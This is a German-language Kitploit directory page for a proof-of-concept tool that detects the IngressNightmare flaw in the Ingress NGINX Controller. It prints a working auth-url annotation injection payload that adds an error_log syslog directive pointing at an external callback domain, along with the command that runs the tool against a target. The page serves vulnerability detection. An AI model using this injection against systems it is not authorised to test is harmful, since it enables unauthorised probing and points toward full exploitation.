Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/m-q-t/ingressnightmare-detection-poc
SchwachstellenscannerExploitationWebsicherheitPenetrationstestsCloud-SicherheitFehlkonfiguration
GitHubm-q-t/ingressnightmare-detection-poc

ingressnightmare-detection-poc

Proof-of-Concept-Tool zur Erkennung von IngressNightmare (CVE-2025-1974) mittels (nicht-intrusiver) aktiver Methoden.

Repository anzeigen
3vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

IngressNightmare-Erkennungstool

Übersicht

Dieses Tool bietet eine nicht-intrusive Erkennungsfähigkeit für die IngressNightmare-Schwachstellenkette (CVE-2025-1974), die den Ingress NGINX Controller betrifft. Es nutzt speziell den Injektionsvektor der auth-url-Annotation (CVE-2025-24514), um das Vorhandensein dieser kritischen Schwachstelle zu überprüfen, ohne beliebigen Code auszuführen.

Technischer Hintergrund

Die IngressNightmare-Schwachstellenkette ermöglicht es Angreifern, beliebige NGINX-Konfigurationsdirektiven über verschiedene Ingress-Annotationsfelder zu injizieren. Wenn diese bösartigen Ingress-Ressourcen vom Admission-Controller verarbeitet werden, werden die injizierten Direktiven während der NGINX-Konfigurationsvalidierungsphase (nginx -t) ausgewertet.

Dieser PoC nutzt gezielt die Schwachstelle der auth-url-Annotation aus, indem die error_log-Direktive mit einem Syslog-Server injiziert wird, der auf eine vom Angreifer kontrollierte Domain verweist. Während der Konfigurationsvalidierung wird NGINX:

  1. Die injizierte Konfiguration parsen
  2. Die angegebene Domain über DNS auflösen

Diese DNS-Auflösungsaktivität liefert ein zuverlässiges Signal dafür, dass das Ziel verwundbar ist, ohne dass Codeausführung oder Dienstunterbrechung erforderlich ist.

Verwendung

  1. Richten Sie einen DNS-Callback-Listener mit Burp Collaborator, interactsh oder einem beliebigen DNS-Überwachungsdienst ein.

  2. Führen Sie das Erkennungstool aus:

    root@kitploit:~
    $ python3 detect.py -t https://target-admission-controller:443 -c w00tw00t.lf4v7uehamhtt4hufhstpla09rfi38rx.oastify.com 
    
  3. Wenn das Ziel verwundbar ist, werden Sie DNS-Auflösungsversuche für Ihre DNS-Callback-Domain beobachten:

poc

Erkennungsmethodik

Das Tool erstellt ein speziell geformtes AdmissionReview-Objekt, das eine Ingress-Ressource mit der folgenden Injektions-Payload enthält:

root@kitploit:~
nginx.ingress.kubernetes.io/auth-url: "http://example.com/#;\n resolver 8.8.8.8;\n error_log syslog:server=unique-id.oastify.com:80 debug;\n #"

Diese Payload:

  • Verwendet das Kommentarzeichen (#), um die URL zu beenden
  • Injiziert einen Zeilenumbruch, gefolgt von einer resolver-Direktive
  • Fügt die error_log-Direktive mit Syslog hinzu, das auf die DNS-Callback-Domain verweist
  • Kommentiert den Rest aus, um die syntaktische Gültigkeit zu erhalten

Wenn diese von einem verwundbaren Admission-Controller verarbeitet wird, führt dies zu einer ausgehenden DNS-Abfrage, die das Vorhandensein der Schwachstelle bestätigt.

Einschränkungen

Dieses Tool erkennt nur das Vorhandensein der Schwachstelle und versucht nicht, sie für eine beliebige Codeausführung auszunutzen.

Quellen

https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities

Tool herunterladen